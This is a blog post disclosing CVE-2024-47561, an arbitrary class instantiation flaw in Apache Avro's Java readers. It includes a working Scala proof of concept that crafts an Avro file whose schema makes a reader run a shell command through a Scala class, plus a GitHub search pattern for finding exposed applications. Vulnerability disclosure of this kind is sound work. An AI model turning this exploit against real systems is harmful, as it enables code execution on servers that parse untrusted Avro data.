Thursday, October 10, 2024

CVE-2024-47561: Apache Avro arbitrary class instantiation

Avro schemas support specifying types as arbitrary Java classes, using properties like "java-class", "java-element" or "java-key-class". This is somewhat documented in org.apache.avro.reflect (Apache Avro Java 1.11.1 API), but not super clearly.

Since it's not super clear, looking at the code (https://github.com/search?q=repo%3Aapache%2Favro+CLASS_PROP&type=code) I saw that this seems to not only be supported in the ReflectDatumReader, but also in the SpecificDatumReader and the FastReader.

When it encounters such a type, my understanding is that the reader will just call the constructor for that type, which takes a single String argument as a parameter. There appears to be no check as to whether or not the type implements any specific base class, or any other safety measure, it just calls it. See getPropAsClass, and getStringClass.

This is pretty bad from a security perspective as it's an arbitrary class instantiation issue. Now the question becomes: can I find a class that when constructed with a String parameter will do something bad, like execute an arbitrary shell command? It turns out to be pretty easy to find in an environment where Scala is used, as the class scala.tools.nsc.interpreter.ProcessResult will do just that.

The following piece of code demonstrates the issue, by creating an Avro file that will trigger the vulnerability when parsed with a SpecificDatumReader:
{
  import java.io.File
  import org.apache.avro.Schema
  import org.apache.avro.generic.{GenericData, GenericDatumWriter, GenericRecord}
  import org.apache.avro.specific.SpecificDatumReader
  import org.apache.avro.file.{DataFileWriter, DataFileReader}
  import scala.util.Try

  // Create an Avro file with the crafted Schema & Record
  val avroSchema = new Schema.Parser().parse("""
{
  "type": "record",
  "name": "topLevelRecord",
  "fields": [
    {
      "type": {
        "type": "string",
        "avro.java.string": "String",
        "java-class": "scala.tools.nsc.interpreter.ProcessResult"
      },
      "name": "value"
    }
  ]
}
""")
  val datumWriter = new GenericDatumWriter[GenericRecord](avroSchema)
  val dataFileWriter = new DataFileWriter[GenericRecord](datumWriter)
  val avroFile = "/tmp/avro"
  dataFileWriter.create(avroSchema, new File(avroFile))
  var record = new GenericData.Record(avroSchema)
  record.put("value", "touch /tmp/toad")
  dataFileWriter.append(record)
  dataFileWriter.flush
  dataFileWriter.close

  // Trigger the arbitrary class instantiation
  val datumReader = new SpecificDatumReader[GenericData.Record]()
  val dataFileReader = new DataFileReader[GenericData.Record](new File(avroFile), datumReader)
  record = new GenericData.Record(dataFileReader.getSchema)
  while (Try(dataFileReader.hasNext).getOrElse(false)) {
    record = dataFileReader.next(record)
    println(record)
  }
  dataFileReader.close
}
Since this is a "it-depends-how-you-use-the-SDK" type of problem, real world impact is highly dependent on the application. One would have to use one of vulnerable Readers, but also accepts a Schema as input (which is often times embedded in the stream or file to be fair). If someone wants to be creative with GitHub search patterns like https://github.com/search?type=code&q=%2Fnew+%28Specific%7CReflect%29DatumReader.*schema%2F+path%3A%2F%5C.%28java%7Cscala%29%24%2F they probably can figure it out.

No comments: